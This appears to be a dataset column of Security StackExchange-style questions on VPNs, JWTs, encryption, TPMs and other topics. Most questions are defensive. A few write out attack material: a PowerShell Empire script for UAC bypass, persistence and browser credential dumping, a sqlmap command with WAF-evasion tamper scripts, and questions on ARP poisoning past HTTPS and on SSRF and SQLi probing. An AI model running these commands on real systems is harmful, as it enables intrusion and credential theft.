instruction
stringlengths
24
29.9k
If I can decrypt or "unprotect" a sheet or a workbook in Excel in a matter of 2-3 minutes (faster then it usually takes to read the linked article!), by a means of simple .zip archive modification then should Office 2007+ files be still treated as secure? To make things even more sad, I can modify contents of such "pro...
So I had a look at the latest DOCSIS 4.0 Security Implementation paper here https://www.cablelabs.com/technologies/docsis-4-0-technology I found that they’re implementing SHA -1 and 3DES for security. I mean, why? Surely SHA-256 and AES would be a better choice and AES would be faster in GCM than 3DES to implement over...
I recently came across an application that was vulnerable to HTML injection on the invite function. When I insert <img src="image.jpg"> the image got rendered on the mail I received. I decided to test for blind ssrf out of band detection, so I gave the payload as <img src=" burp collaborator payload"> and sent the invi...
I am using NordVPN, but I believe this applies to VPNs in general. For some time now, I have been worried about the reliability of my VPN provider, especially because information that shows up when accessing pages do not seem to reflect the country I am supposedly connected to via their server (more times than not). Wh...
I'm tryng to run the following resource file when getting a new agent usemodule privesc/bypassuac "name of the listener" execute y back usemodule persistence/elevated/wmi set Listener "name of the listener" set AtStartup True execute y back usemodule collection/ChromeDump execute y back usemodule collection/FoxDump exe...
We have "web app as a service" offering. And right now each app has its Redis which stores session data. Is it secure if we use one redis cluster for all clients using this app. To be clear not users of a single app, multiple different apps used by multiple users. EDIT: I should not use cluster term here. The basic ide...
As of now, I am using Windows 10 & I want to run kali Linux on Docker. For that, I took the copy from the kali official site Here But after running I found it's just a base OS it doesn't contain all the tools for which kali is famous, it's not a full flash copy. So I want a complete kali image for the docker run where...
Say I have a gateway which provides authorization mechanisms by validating a JWT, behind an api-gateway there are different micro-services but only the gateway port is public. As a software designer you decide to make all micro services unaware of authorization-related operations to remove code duplication and minimize...
Since I cannot receive email directly from my home server, I need an external device to receive messages for me and deliver them to my MTA via another port or via VPN. Instead of renting a VPS just for this, I was thinking about purchasing an unexpensive ARM board and deploying it to one of my friend's house, which has...
I want to use GPG as a master password storage (encrypt and push to online storage). This would require encrypted file being able to be decrypted on multiple machines. Two computers comp1 and comp2 with differing operating systems Comp1 has a file, myfile.txt This file will be stored encrypted on comp1 From my underst...
I designed a Google Form for a website which does not have an SSL Certificate. I have planned to embed it onto a page using an iframe tag. I am currently testing it and have published a test page with the form, but when I fill out any of the fields Google Chrome says that the page is, Not Secure but it is in red unli...
I’m trying to do an ARP poisoning attack in my LAN. I use Ettercap and I place my attacker computer between my routers and target Windows computer. Despite the target ARP table changing, when I use this computer to visit an HTTPS website, the browser (Chrome) stops the connection. Is there a method to make an ARP poiso...
For security and privacy purposes, it's best to keep WebRTC disabled if you aren't using it. Firefox makes this easy by simply setting media.peerconnection.enabled to false. Due to COVID-19, the use of teleconferencing has increased dramatically, which often requires WebRTC. If WebRTC has always been disabled in Fire...
I'd like to use JWTs for user authorization. My intention is use an auth server and an app server to keep them separate. This way my auth server will be the only JWT issuing server and the only server w/login and sign up logic. I've recently run into this issue however - how do I refresh a user's access token if my aut...
By user isolated, I mean that users interact with server and have some personalized data and they can read, update, delete their data but they will never see another user made data (like facebook, stackexcahnge, email). An example for a user isolated app would be a note taking app, todo list app etc. In this case shoul...
Let's imagine a data link layer level MITM attack. Is it possible to fulfill all of the following points? you completely hide your identity by forging your own MAC address you create malformed packets, so the router doesn't even know you are exist you intercept every packet from the victim, and repeat it to the defaul...
I was taught horrible bad practice when I initially "learned" SQL, which baked in user-submitted input with quotes and attempted to "escape" this (in the beginning, I didn't even escape it at all...). I then had to spend many years unlearning this, to instead do things like: SELECT * FROM table WHERE id = $1; And then...
Consider a site for frontend devs/designers to host their portfolio apps - pages with arbitrary JS, each hosted on a user's separate profile. What attack vectors would that enable against the site? Some suggestions and comments: Defacing the site (user's own profile, not interesting) Phishing (by rewriting the UI to a...
When I do online shopping where I use my credit card information to purchase, I clear the browser cache, cookies and only open that single site. After I am done, I again clear the cache, cookies and start with my regular browsing. I do this to ensure any other websites that I open on a new tab do not sneak into my cred...
Hackers usually attack open ports and services, but I want to know how they find security holes in specific ports or services.
I have a backend that I developed on PHP/MySql which will provide some URL endpoints in order to get data or post data. I am using those URL endpoints in my application (WebGL application). Now, the problem is, the URL endpoints are public and anyone can use those URL by simply inspecting the browser. An attacker can g...
I know UDP Scan is very slow and there are a lots of parameters for nmap like, --max-retries etc. But i want to speedly udp port scan. I tried a lots of programs but not speedly. Any alternative nmap for speedly UDP scan technique or program/script?
What is sometimes called Zero Knowledge, sometimes end to end encryption occurs when a server only processes ciphered data (at least for sensitive data) with a result where a compromise of this server does not threat the confidentiality of the data. In this model : the data are deciphered at the client side (web brows...
I just read following statement in a technical guideline about network-accessible mobile devices with medical applications (BSI TR 03161): The application MUST verify the integrity of the back end before accessing it with reference to: The application MUST support certificate pinning, i.e. it SHALL NOT accept certif...
Cloud computing provider Blackbaud reported on https://www.blackbaud.com/securityincident "...the cybercriminal removed a copy of a subset of data from our self-hosted environment. ... we paid the cybercriminal’s demand with confirmation that the copy they removed had been destroyed." How can the company be certain tha...
So family operates a small bar/lounge in Florida and I work for them part time as a bar back / IT technician. For the past couple months we have been trying to become pci compliant. However, we keep running into issues with passing a network vulnerability scan (which I think is being caused by our icrealtime security c...
Is it is a good idea to restrict access to the admin-login-page-url of a website, by making a .htaccess rule that only allows access to the dedicated VPN IP? If so, is it recommended to just buy the dedicated IP from popular VPN providers? My goal is that only people having access to this VPN IP can reach the URL. So f...
I want to enable "Sign-in with apple" in my application. As you can see here App sends Token authorization code to the backend, and then backend needs to talk with Apple ID to verify the user. This is the recommended way from iOS docs, but I noticed when the app calls the "Sign in with Apple" function it gets a JWT wh...
My company's laptop has a VPN installed that connects to the company's network. No other VPN software can be installed. However, I have a VPN router that has ExpressVPN installed so all devices connected to this router has VPN connection. If I am out of state or in another country and set my location to my home state i...
I got a *.openvpn from work and I monitored the traffic on wireshark. On my normal vpn every traffic is routed via the vpn (as expected). But with this work vpn only the traffic that uses the work servers use the openvpn protocol. So I'm wondering how do they detect if certain traffic should be rerouted over the work v...
If I send someone a text, how much information am I giving up? Could they add me to an app like Whatsapp and access my name and profile? Or does their number first have to be saved in my phone contacts for that to happen? What other information could they access just from a text message, assuming I have not added them ...
I am passing value from input filled directly into a script function inside a JSON object. I was thinking, is it possible that this input can escape this object and can lead to XSS or something. <script> ... function doSomething(item) { data = {'content':item} } ... </script> <input id="search" type="text" value="" on...
Context I found out my Linux server was infected. Symptoms were : 100% CPU usage when idle, slow download speed, iptables rules keeps growing. After finding the processes, killing it and all the possible ways it setup to restart again, I'm back with a normal-looking server (no symptoms). I used this blogpost (in chines...
When on any retailer website at the very end we are asked to make a payment. However it is not uncommon to not be taken to an external portal, usually, for example, aliexpress and Amazon will ask to use your credit card details while still on the website. e.g. the url that Aliexpress will ask you to enter your credit c...
This is an old 802.11w issue that has been documented and it's a very big issue as clients can be selectively attacked and enter a deadlock, where only disabling and re-enabling wifi solves the issue (in fact I'm currently experiencing these attacks from an unknown source). So my question is if there's a way to solve t...
In my web app I'm using a good sanitizer which let's me to whitelist some specific html tags. I'd like to allow <iframe> so that users can insert youtube videos and so on. However I'm worried about vulnerabilities that this approach would introduce. So not sure this is a safe idea. Appreciate your hints about this.
Yesterday I started running a cronjob [code below] on my server ('*/1 * * * *', 'api.cron.sync_with_elastic',['nginx-access-logs']) In the morning I got a message that my website is down. I was unable to even SSH, I switched off the server from dashboard my cloud provider has provided and then restarted it. Below is t...
I'm new to FIDO2 specification. I'm aware that Android and IOS devices support FIDO2 protocols (even Android phones could act as a physical key for FIDO2 authentication). However, Could anyone let me know that, when we use the platform authenticators such as Android fingerprint, where are the credentials (private keys)...
Im considering using this nginx module https://github.com/leev/ngx_http_geoip2_module to get the Information from which Country the IP is. My question is since im compiling the module by myself, how secure is it if i'm not keeping up with the current version. I'm not a specialist here, so if i'm having an outdated modu...
Was viewing this page on cookies and wondering for those under Third party cookies, such as TS*, TS01*, TSXXXXXXX_d, what does it mean by them being a "security" cookie? Does it mean there is no need to secure such cookies by configuring things like httponly/secure flags? thanks
Imagine you are carrying highly sensitive information with you, maybe on a mission in a war zone. You get in an ambush and quickly need to erase all the files before they fall in the wrong hands. This has to happen within seconds. What devices are used for such operations, are there special hard drives which have a phy...
I'm trying to get the hostnames of devices on my LAN. This network is not a Windows network. Up until now I was able to sniff DHCP requests and extract the hostname from there, but it looks like Android devices starting from Android 10 stopped filling out that particular field. (I've also tried sending a netbios query)...
There is a lawsuit claiming Google tracks users in private browsing mode. How exactly is Google achieving this?
Someone I know was stolen a few hundreds dollars from a savings account. Looking at the history, she saw transactions like Uber rides and video games purchases she did not do. This account is used strictly for investing and is only accessed from her iPad. The only access card is in a drawer in her home and has never be...
Id like to create an application which trusts certificates issued from specific CAs. My ideas is to have a list of thumbprints for CA certificates I trust. Then whenever my app receives a certificate for authentication, it checks its cert chain and makes sure the thumbprint of its issuing certificate is found in my "tr...
Do incident response plans include the playbooks or are the playbooks separate from the incident response plan?
I would like to protect my .bin ( squash fs ) file after compiling process in order to avoid reverse engineering techniques ( i.e. binwalk could simply unsquash my .bin firmware and see all the file system ) Could you recommend any tools for crypting the .bin file or other techniques? Hope my question is clear Thanks
Which vulnerabilites does HTTP/2 prevent? More specifically: Does it prevent HTTP request smuggling? Does it prevent HTTP response splitting / CRLF injection?
In the OWASP Mobile Application Security Checklist there is a requirement MSTG-ARCH-7 which reads: "All security controls have a centralized implementation". Now I'm struggling a bit by what is meant with "centralized implementation" in this respect. Of course, I would imagine that you would want to have one component ...
I'm new to security domain, and recently I have learned about Oauth2.0/OpenID connect and JWT tokens. I have an existing REST based web application where I need to implement security. Server Application A: Spring boot back-end application sever, with some RestEndpoints exposed connected with Mysql database. Front End A...
I want to generate a password for a Keystore in java on Windows platform. I would like to make a HASH out of some hardware information from my computer and some salt. My question is: which hardware or system information i should use for my password generator? I want something that is 100% guaranteed it does not change ...
My company laptop recently needed a new mainboard as the old one was defective. The repair was carried out by the manufacturer, who sent a field engineer to my home. Since the laptop uses BitLocker with keys stored in the TPM, I asked our IT support guy what I needed to do in order to be able to boot up the laptop with...
I have a MediaWiki website in Hebrew; As common with MediaWiki websites, it has lots of content and rebuilding it in case of a disaster isn't feasible. I chose to give that website a Global TLD (a non Israeli X.il TLD) because: Currently, the Israeli Internet association doesn't allow Israeli domain registrars to suff...
My school started using Google Meet for online classes. The accounts we use are managed by them and they told us that they know the IP of the device that we are logging in from. What else can they know/monitor? Can they see our search history? Our files at Drive, our documents at Google Docs? Do they only see your acti...
I use Outlook to send email. In order to encrypt them, I use S/MIME with a signed certificate. I don't find the answer on how the storage of the email I send is performed. First option as I am the expeditor, the email is stored in clear on my computer. Second, I create an encrypted version of the email for me and I sto...
Unfortunately, I find myself serving a 14d COVID-19 self-isolation period in a hotel which only offers unsecured public WiFi. This has me wondering if all the financial apps on my iPhone with FaceID-enabled sign-ons are secure or not (e.g. Charles Schwab, American Express, etc.) Can anyone comment on the typical securi...
I have some files on an NTFS USB drive. The files were encrypted on a Windows 10 pc and copied to the USB. I had to completely reinstall Windows on the PC. I do not have a backup of the USB files I know the name of the PC, and the username and password. Is it possible to regain access to the files on the USB? I can tak...
Wondering how other organizations manage software update process. We are a startup, were we try to define components owners, which should update them (security updates etc). This does not to seem to work well. People leave, components are left not updated. How to organize effective and working update process in the org...
Someone has a service that uses a FIPS non-compatible hash in a protocol signature. When FIPS 140-2 compatibility is enabled on the hosts the service crashes (due to the hash signature being not allowed by the security configuration of the host). A way to get around this is to put the service in a Docker container on...
I'm making an e-mail system/client. I'm trying to correctly detect incoming e-mails which can be replied to with PGP encryption. This means finding out their public PGP key. I currently do: Parse the e-mail body for a PGP public key block. I suspect that these could be done: Check for attachments with some kind of s...
I suspect that I am being targeted in a man-in-the-middle attack from the ISP or in-between of the fiber cable transit or the node by sniffer hardware that detects and injects the malicious packets. I am using a VPN service and it's encrypted end-to-end but whenever I disconnect the VPN for a local streaming service, f...
The clients can use Google and Facebook OAuth for authentication I need to implement a chat application where the messages are end-to-end encrypted When the user changes device, the client should be able to decrypt the messages downloaded from the server Roughly the end-to-end encryption works like this: Client gen...
I visited website B after visiting website A. Upon clicking the search bar on website B, a dropdown menu appeared containing the words I searched on website A. After clearing my browser history and cookies, the search bar on website B no longer displayed my previous searches on website A. Does this mean that website B...
How is it possible to create an account in a website with completely different credentials without the website being able to link the user of the first account and this new one? Tor is not a viable option because the website does not allow it. Ive tried VPNs but the website was still able to link my phone to the new ac...
I found that AES has dedicated hardware on most machines. The question is can we use ed25519 to replace AES? Instead of using RSA to encrypt the AES key and then encrypt the data with AES, can we just use ed25519 and stop using AES? Are there any performance comparisons between the two? I went through this and couldn't...
My PC is infected with some sort of ransomware. I managed to take out the root processes of the virus (which encrypt and change all document, images and video files to *.repl files) but recovering the infected data is a bit difficult and not many resources available online yet.
I was recently testing for Clickjacking and when I opened developer tools, I was warning Content Security Policy: Ignoring “'unsafe-inline'” within script-src or style-src: nonce-source or hash-source specified Do you guys think it is possible to bypass it, If yes can you share me the further information? Thank You.
What's the chance of guessing valid credit card data that could be used to make a payment online? To me, it looks like it's not extremely hard to guess, but I'm not able to calculate the probability. I mean, it's not like it was designed to be as strong as 128-bit keys, which you know you can't really crack. So I wonde...
I used .asc for ASCII armored (using --armor) encrypted messages. But what extension should I use when encrypting file.tar.gz for example?
I'm trying to figure out if an SQLi for the following PostgreSQL/Java code exists. public void availableItems(String name) { return this.query("SELECT * FROM items WHERE name='"+name+"'"); } Assuming that in the name is removing apostrophe and semicolon. Is it possible to make a SQLi work with this restrictions? my ...
We have a web solution (running in IIS) where AD users and non-AD users need to log into. We sell this to companies and will run this on-prem only. non-AD-FS and only AD question (so no federation) I asked on stackoverflow if it is valid to pass the username and password to the web application and have the application ...
I'm trying to sign a CSR using python-asn1crypto and python-pkcs11. I have an ECC Keypair stored in a Hardware Security Module (HSM). Here's a code sample: key = decode_ec_public_key(encode_ec_public_key(pub)) info = CertificationRequestInfo({ 'version': 0, 'subject': Name.build(subject), 'subject_pk_info'...
I'm trying to understand and perform the Prefetch Side-Channel Attacks:Bypassing SMAP and Kernel ASLR. The author have released the proof-of-concept code. I'm trying to run the attack on my Intel Haswell machine, using Linux Ubuntu 20.04, 64-bit. This attack is based on two property: Property 1 The execution time of p...
Let's say that an attacker wants to search websites for RFI/LFI vulnerability with a script, he's fuzzing the URL with a list of remote/local files. And he prints the headers that return from the request. How can the attacker know when the RFI/LFI was successful? Is the content-length header can tell us something? If ...
Okta recently sent out an email to admins about changes to their new device detection strategy. According to them: Due to browser advancements in anonymous web browsing, JavaScript fingerprinting techniques are quickly becoming obsolete. Google, Mozilla, Microsoft, and Apple are working to improve privacy, gradually ...
This is what I have so far but it is pretty open. *filter :INPUT DROP [0:0] :FORWARD DROP [0:0] :OUTPUT DROP [0:0] -A INPUT -p ipv6-icmp -j ACCEPT -A INPUT -i lo -j ACCEPT -A OUTPUT -p ipv6-icmp -j ACCEPT -A OUTPUT -o lo -j ACCEPT -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT COMMIT If you have time, explai...
I have a VM which is exposed to the internet. I can see a lot of scans for /azenv.php, /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php and like in my server logs. How do I protect from these scans? Am I being targeted for a hack? Is this a concern at all?
I'm trying to make notes about the TPM and what it does. More specifically I'm looking at the 3 RSA key pairs: the 'endorsement key', the 'storage root key' and the 'attestation identity key'. This is what I have written so far: The ‘Endorsement Key’ is an RSA key pair where any data sent to another device is encrypted...
I've been preparing for a CISSP exam and was reading about applied cryptography in regard to email. It's my understanding that the popular schemes (PGP,S/Mime) use a combination of asymmetric and symmetric cryptography. If I'm reading things correctly, in S/MIME, the message is encrypted using a sender generated symmet...
I am setting up a few VM's (assume VirtualBox w/ Linux). They will all be on the same PC host (assume Linux) and the intent is to have all the VM's handle separate functions (business, personal finance, and personal) and have no connection to each other through the network or otherwise. I want to set them up in a way t...
I am trying to hash a list of passwords with PBKDF2-HMAC-SHA1 and then crack them using John. However, John does not recognise the hashes and I get a No Hashes Found error. It works with SHA256, but I need PBKDF2-HMAC-SHA1. I have looked everywhere and have exhausted all my options. What is the correct format of PBKDF2...
Background: I've been using a simple session cookie design for my web app. I have a users table, and a sessions table that basically looks like this: id | user_id | visited_at -----+---------+----------- int | int | timestamp And a session cookie contains just a session ID, signed with a secret key. I give the ...
I was once a customer of a certain developer who sold a SaaS bookkeeping software which allowed sending deal documents (invoice, receipt, etc) to a customer, from the software's very own email server, and any content sent was always digitally signed. I know that in the context of emails, at least four "aspects" can be ...
If I were to encrypt a folder with music files or movie files, or even only the files themselves separately, would that hurt the quality of the files? For example, if I encrypted a lossless audio file, and decrypted it right after, would it lose quality or would it be the exact same file?
I was asking myself, how there are still account generators (e.g. for Steam) wide available for everyone. With account generators I mean programs, that are automatically creating a huge amount of accounts to scam people or something like this. Is it that easy to just bypass those tests without a big pricing or even for...
A person talks about a certain thing (product or service) with another person and a short time after the talk the person gets the advertising of the discussed thing on the mobile or desktop device. I heard and read about such occurrences and didn't know what to think about it. Until some days ago I've personally experi...
If I decided today get new subkeys because I simply want to rotate them or because they are about to expire, do I have to sign all keys of other people I signed with my old signing key again? And if I let my subkeys expire, does that have the same effect as if I revoked them?
My router can be configured by going to 192.168.1.1:80 when connected either by WiFi or by Ethernet cable. Can the same configuration web interface be accessed from the external interface (the public IP of the router)? Some background: I have a "Technicolor TD5130" and I wanted to change the default password that the I...
I am writing a web scrapping application using core Java. However when the application tried to access some https enabled URLs I am getting error. Below are the details. Code: url = new URL("https://stackoverflow.com"); is = url.openStream(); Error: javax.net.ssl.SSLHandshakeException: sun.sec...
My project is a flutter app, it is in Internal Testing only, I am the only user. I've been working on this project for about a month and all of a sudden today I keep getting unknown users registering. These unknown users are not registering through my app otherwise I would see additional data in my Firestore database. ...
I got a HyperX Cloud Stinger headset, wired and 3.5mm connector. Is it possible to infect my headset with some kind of malware? If my headset is infected with any kind of malware, it would transfer some malware to another computer that I plug my headset in. That worries me. If I plug my headset in some computer and tha...
As far as I understand, there should be no problems with using CNAME or DNAME records in connection with DKIM. That is, while the DKIM record for verifiying a mail from someone@example.com wants to be retrieved as a TXTRR under some.selector._domainkey.example.com, it might well be that some redirection occurs, such as...
Users can interfere with any piece of data transmitted between the client and the server, including request parameters, cookies, and HTTP headers. Where is the best way to filter user input, on the client side or in the server side ? If the filtering happening on the client side, users can look at filter implementation...
My problem boils down to the use of Okta's access tokens to secure api endpoint. I followed this okta guide to set up a react single-page application with their wiget. When I log into the site I get a access token to use with my api. I tried to access my api with the access token following this guide On the api side Ok...
If you are buying used device, laptop or game console, or a smartphone - what are the best practices for checking it’s security? How to check if device’s HW wasn’t modified or it is not coming with malware preinstalled by previous user?
I'm reading about Diceware and cryptography in general and I know how secure Diceware can be. I stumble upon this part on The Intercept about Diceware and it says: "You don’t so much need them for logging into a website or something else on the internet. In those situations, you get less benefit from using a high-entr...
For an application with login and logout functionalities and browsing based upon authentication , what all do i need to secure it ? I am basically very new to security and googling is leading to more confusion . To start with i have decided to use JWT as the backbone . the client will log in , he/she gets a jws and the...
If I generate a payload with my IP address and it got detected by the user will my IP exposed?
I woke up this morning to over 900 emails of several online services asking to confirm I’ve made an account. Last month my email had been compromised and they managed to get into my eBay and Amazon accounts. I managed to remedy the situation, and changed my passwords on everything. My password on my email is different ...
I run this command python sqlmap.py -u https://acme.com/post.php --data "id=1" --tamper="between,randomcase,space2comment" -v 3 --random-agent --dbs but SQLMap only returns information_schema database. Is there something wrong (if so, is there anything I can do to circumvent it ?) or the database really only has 1 data...